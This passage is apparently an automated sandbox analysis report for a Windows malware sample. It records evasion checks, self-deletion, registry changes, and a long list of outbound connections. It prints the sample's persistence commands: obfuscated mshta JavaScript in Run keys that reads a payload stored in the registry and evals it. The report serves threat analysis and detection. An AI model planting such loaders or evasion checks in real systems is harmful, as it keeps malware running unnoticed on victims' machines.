Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\ = "mshta javascript:zI72QEMJ=\"mEn\";t6y=new%20ActiveXObject(\"WScript.Shell\");l7dV0Rbj=\"3dVEoq7\";My2vD=t6y.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\1f2fa368\\\\2bef0163\");MMnycq7LV=\"sfg9P0f\";eval(My2vD);Xtp0SA3h=\"e\";" C:\Windows\SysWOW64\dllhost.exe N/A

Looks for VMWare Tools registry key

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools C:\Windows\SysWOW64\dllhost.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\dllhost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\SysWOW64\dllhost.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:ZxLmo4T5D=\"q8\";K06L=new%20ActiveXObject(\"WScript.Shell\");F3Eh2VQWm=\"3Ew7\";T4e4vE=K06L.RegRead(\"HKCU\\\\software\\\\1f2fa368\\\\2bef0163\");dJYrYqT1=\"wXOGUOlz\";eval(T4e4vE);PbeN6zw6vy=\"vzS8\";" C:\Windows\SysWOW64\dllhost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:BmzO8j2S=\"a\";mH56=new%20ActiveXObject(\"WScript.Shell\");bD71zWznMU=\"p0KTAfGS\";p8RgK=mH56.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\1f2fa368\\\\2bef0163\");du8ag1Xm=\"jl\";eval(p8RgK);pbajT0bUV=\"k\";" C:\Windows\SysWOW64\dllhost.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\SysWOW64\dllhost.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\Windows\SysWOW64\dllhost.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\explorer.exe = "0" C:\Windows\SysWOW64\dllhost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\dllhost.exe = "0" C:\Windows\SysWOW64\dllhost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\explorer.exe = "0" C:\Windows\SysWOW64\dllhost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" C:\Windows\SysWOW64\dllhost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\dllhost.exe = "0" C:\Windows\SysWOW64\dllhost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Internet Explorer\International C:\Windows\SysWOW64\dllhost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Windows\SysWOW64\dllhost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" C:\Windows\SysWOW64\dllhost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Windows\SysWOW64\dllhost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl C:\Windows\SysWOW64\dllhost.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1c101db2daf76a3fd49172ed7855abfe_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1c101db2daf76a3fd49172ed7855abfe_JaffaCakes118.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\1c101db2daf76a3fd49172ed7855abfe_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\1c101db2daf76a3fd49172ed7855abfe_JaffaCakes118.exe"

C:\Windows\SysWOW64\dllhost.exe

dllhost.exe

C:\Windows\SysWOW64\dllhost.exe

dllhost.exe

C:\Windows\SysWOW64\dllhost.exe

"C:\Windows\SysWOW64\dllhost.exe"

C:\Windows\SysWOW64\explorer.exe

explorer.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4352 --field-trial-handle=2256,i,6670388345726423024,18382795228658886258,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 218.143.123.92.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
KR 223.63.61.30:80 tcp
US 9.180.11.105:80 tcp
US 50.19.246.254:80 tcp
US 8.8.8.8:53 254.246.19.50.in-addr.arpa udp
US 50.19.246.254:80 50.19.246.254 tcp
US 64.184.85.198:80 tcp
CN 101.74.51.52:80 tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
CA 142.128.121.95:80 tcp
CN 112.126.243.25:80 tcp
US 50.90.76.3:80 tcp
AU 13.77.17.44:8080 tcp
US 173.24.114.64:80 tcp
TT 190.58.114.150:443 tcp
TW 140.96.39.103:80 tcp
FR 94.139.37.220:80 tcp
US 207.244.93.131:80 tcp
CN 36.105.182.97:80 tcp
RU 213.87.52.237:80 tcp
RU 213.189.241.231:80 tcp
TH 122.154.8.45:80 tcp
DE 85.16.121.59:80 tcp
N/A 100.76.101.66:80 tcp
JP 150.19.159.238:80 tcp
BG 109.121.158.2:443 tcp
FR 109.30.172.130:80 tcp
GR 80.106.150.98:80 tcp
FR 92.160.97.40:80 tcp
ES 213.94.23.202:80 tcp
CN 182.240.226.112:80 tcp
US 47.181.86.120:8080 tcp
MA 105.188.162.103:80 tcp
CO 186.83.152.127:80 tcp
DK 85.184.179.86:443 tcp
US 135.165.222.22:80 tcp
TR 176.238.20.171:80 tcp
SA 176.45.239.199:80 tcp
AU 167.30.15.168:80 tcp
DK 85.184.166.185:80 tcp
MX 201.164.135.9:80 tcp
PR 57.91.219.242:80 tcp
NL 137.174.230.254:80 tcp
US 32.118.204.129:80 tcp
JP 126.204.22.182:80 tcp
GB 140.228.48.134:80 tcp
US 208.4.122.26:80 tcp
ZA 105.4.86.84:80 tcp
CN 36.108.2.235:80 tcp
US 174.251.102.27:80 tcp
US 70.177.210.52:80 tcp
FR 128.93.171.129:80 tcp
DE 194.42.181.52:80 tcp
US 167.173.80.254:80 tcp
US 35.107.15.33:80 tcp
US 63.79.97.21:80 tcp
DE 136.172.206.51:80 tcp
SE 193.10.82.218:80 tcp
KR 124.57.172.67:8080 tcp
US 150.159.119.64:80 tcp
BE 109.139.244.151:80 tcp
US 52.111.2.132:80 tcp
DE 77.182.89.98:80 tcp
CA 75.156.61.124:80 tcp
GB 84.92.218.214:80 tcp
US 168.183.63.135:80 tcp
NL 82.72.153.23:80 tcp
US 8.8.8.8:53 135.63.183.168.in-addr.arpa udp
BR 179.168.203.241:80 tcp
US 35.110.251.19:80 tcp
US 170.97.12.92:8080 tcp
US 140.8.107.143:8080 tcp
US 174.87.212.178:80 tcp
US 57.162.149.224:80 tcp
US 26.152.135.179:80 tcp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
ID 120.165.73.79:80 tcp
TW 60.244.183.225:80 tcp
AE 83.110.218.107:80 tcp
US 130.175.220.185:80 tcp
DE 31.239.214.160:80 tcp
US 16.175.172.29:80 tcp
JP 122.219.80.106:80 tcp
US 108.185.71.19:443 tcp
NZ 47.72.93.219:80 tcp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 172.217.169.10:443 chromewebstore.googleapis.com tcp
ZA 41.16.222.164:8080 tcp
CN 106.86.86.179:80 tcp
US 8.8.8.8:53 10.169.217.172.in-addr.arpa udp
US 132.43.127.41:80 tcp
ZA 105.2.137.198:80 tcp
US 96.88.8.194:80 tcp
EG 62.135.19.61:80 tcp
US 63.36.141.36:80 tcp
IN 221.135.111.174:80 tcp
ZA 197.107.75.142:80 tcp
DE 139.29.212.30:80 tcp
GB 145.43.232.209:80 tcp
US 108.121.38.20:443 tcp
KR 112.187.216.186:80 tcp
DE 139.21.2.255:8080 tcp
US 35.173.241.198:8080 tcp
CN 106.39.49.85:80 tcp
DE 195.109.98.14:80 tcp
VE 167.134.59.221:80 tcp
FI 88.115.228.103:80 tcp
JP 103.167.42.224:80 tcp
BR 187.99.93.173:8080 tcp
US 107.184.230.180:80 tcp
US 163.2.145.136:80 tcp
US 138.149.254.226:80 tcp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
CN 118.199.172.253:80 tcp
IE 52.16.96.162:80 tcp
US 29.37.111.253:80 tcp
US 54.84.249.93:80 tcp
JP 220.63.42.71:80 tcp
US 166.222.235.163:80 tcp
US 99.126.16.232:80 tcp
JP 153.161.100.172:80 tcp
IN 202.71.25.98:443 tcp
US 167.21.196.159:443 tcp
FR 92.183.105.193:80 tcp
CH 217.162.165.174:80 tcp
SI 193.2.23.230:80 tcp
JP 221.103.206.222:80 tcp
TW 118.232.138.233:80 tcp
US 52.55.248.220:80 tcp
CN 210.36.220.23:80 tcp
US 7.209.185.70:80 tcp
US 48.102.200.105:80 tcp
SE 130.240.67.149:80 tcp
JP 150.99.185.130:80 tcp
CN 119.185.12.241:443 tcp
US 207.28.128.25:80 tcp
IT 151.52.96.224:80 tcp
FR 193.108.216.121:80 tcp
US 159.236.98.30:80 tcp
CN 113.16.5.155:80 tcp
RU 46.160.61.91:80 tcp
US 209.57.223.123:80 tcp
US 50.138.224.228:443 tcp
CN 183.232.11.175:80 tcp
US 33.125.170.40:80 tcp
CN 222.31.218.10:80 tcp
BR 179.232.189.87:80 tcp
US 129.155.194.210:80 tcp
CN 183.187.23.221:80 tcp
US 184.113.211.65:80 tcp
US 215.161.242.172:80 tcp
US 150.231.166.54:80 tcp
NL 208.75.15.120:80 tcp
US 104.15.4.23:80 tcp
US 99.37.142.196:8080 tcp
US 72.238.206.126:80 tcp
US 161.57.19.201:443 tcp
BE 164.15.195.67:80 tcp
KR 125.150.153.175:80 tcp
US 149.58.152.71:80 tcp
US 38.8.131.143:80 tcp
US 50.164.88.177:80 tcp
JP 161.34.125.216:80 tcp
US 74.173.240.73:80 tcp
US 47.185.137.93:80 tcp
GB 141.97.70.199:80 tcp
US 21.230.24.30:80 tcp
JP 133.175.109.7:80 tcp
BR 152.234.169.221:80 tcp
BR 179.68.111.11:80 tcp
CN 118.188.226.226:8080 tcp
US 132.42.148.130:80 tcp
PT 89.214.67.16:80 tcp
US 159.172.160.215:80 tcp
CN 110.251.154.199:80 tcp
SA 37.107.70.165:80 tcp
CN 110.242.238.234:80 tcp
US 96.5.148.196:80 tcp
MX 148.208.107.175:80 tcp
FI 157.200.253.30:80 tcp
CN 119.166.220.2:80 tcp
JP 143.201.16.16:80 tcp
HK 43.250.190.239:80 tcp
AU 110.32.182.136:80 tcp
CH 57.4.191.133:80 tcp
US 8.8.8.8:53 239.190.250.43.in-addr.arpa udp
NZ 156.62.76.45:80 tcp
US 98.165.106.120:80 tcp
CN 175.150.83.235:80 tcp
GB 148.181.173.194:8080 tcp
SG 124.246.82.49:80 tcp
US 108.37.30.135:443 tcp
DE 109.250.61.161:80 tcp
N/A 100.110.246.6:80 tcp
DE 141.34.70.124:80 tcp
CN 110.155.94.254:80 tcp
MX 148.207.125.216:8080 tcp
ZA 41.145.61.165:443 tcp
RU 87.250.242.207:80 tcp
NO 2.149.46.172:80 tcp
US 129.22.128.20:80 tcp
US 169.251.121.154:80 tcp
RU 178.18.12.183:80 tcp
GB 146.31.80.106:80 tcp
KW 37.231.120.6:80 tcp
US 55.198.204.12:80 tcp
US 18.174.226.139:80 tcp
KR 175.119.224.152:443 tcp
US 146.9.72.6:80 tcp
N/A 10.220.226.49:80 tcp
FR 2.11.143.192:80 tcp
FI 164.5.16.207:80 tcp
CN 182.16.213.137:80 tcp
US 8.8.8.8:53 11.179.89.13.in-addr.arpa udp
GB 86.22.101.221:443 tcp
US 206.26.150.122:80 tcp
US 47.225.240.15:80 tcp
US 96.46.10.114:80 tcp
US 33.118.241.245:80 tcp
US 7.152.45.85:80 tcp
US 173.68.246.128:80 tcp
US 13.117.253.56:80 tcp
GE 37.232.78.125:80 tcp
AU 125.168.91.46:443 tcp
US 35.97.164.25:80 tcp
N/A 153.19.226.115:80 tcp

Files

memory/1380-1-0x0000000002230000-0x0000000002231000-memory.dmp

memory/1380-0-0x00000000025E0000-0x0000000002C31000-memory.dmp

memory/1380-2-0x0000000000400000-0x0000000000491000-memory.dmp

memory/1380-4-0x0000000000060000-0x0000000000124000-memory.dmp

memory/3720-6-0x00000000001A0000-0x00000000001A7000-memory.dmp

memory/3720-7-0x0000000001200000-0x00000000012C4000-memory.dmp

memory/1380-8-0x0000000000060000-0x0000000000124000-memory.dmp

memory/1380-9-0x0000000000400000-0x0000000000491000-memory.dmp

memory/1380-10-0x00000000025E0000-0x0000000002C31000-memory.dmp

memory/904-14-0x00000000001A0000-0x00000000001A7000-memory.dmp

memory/3720-11-0x0000000001200000-0x00000000012C4000-memory.dmp

memory/904-16-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-19-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-18-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-17-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-15-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-20-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-21-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-22-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-23-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-24-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-25-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/4672-26-0x00000000001A0000-0x00000000001A7000-memory.dmp

memory/4672-27-0x0000000000E00000-0x0000000000EC4000-memory.dmp

memory/4672-32-0x0000000000E00000-0x0000000000EC4000-memory.dmp

memory/4672-31-0x0000000000E00000-0x0000000000EC4000-memory.dmp

memory/4672-30-0x0000000000E00000-0x0000000000EC4000-memory.dmp

memory/4672-29-0x0000000000E00000-0x0000000000EC4000-memory.dmp

memory/4672-28-0x0000000000E00000-0x0000000000EC4000-memory.dmp

memory/904-33-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-37-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-40-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-39-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-38-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-36-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-35-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-34-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-41-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/3576-42-0x0000000000AE0000-0x0000000000F13000-memory.dmp

memory/3576-43-0x0000000000AE0000-0x0000000000F13000-memory.dmp

memory/3576-45-0x0000000000F30000-0x0000000000FF4000-memory.dmp

memory/3576-48-0x0000000000F30000-0x0000000000FF4000-memory.dmp

memory/3576-47-0x0000000000F30000-0x0000000000FF4000-memory.dmp

memory/3576-46-0x0000000000F30000-0x0000000000FF4000-memory.dmp

memory/3576-44-0x0000000000F30000-0x0000000000FF4000-memory.dmp

memory/3576-50-0x0000000000F30000-0x0000000000FF4000-memory.dmp

memory/904-60-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-63-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-68-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-67-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-66-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-65-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-64-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-62-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-61-0x0000000000C00000-0x0000000000CC4000-memory.dmp

memory/904-59-0x0000000000C00000-0x0000000000CC4000-memory.dmp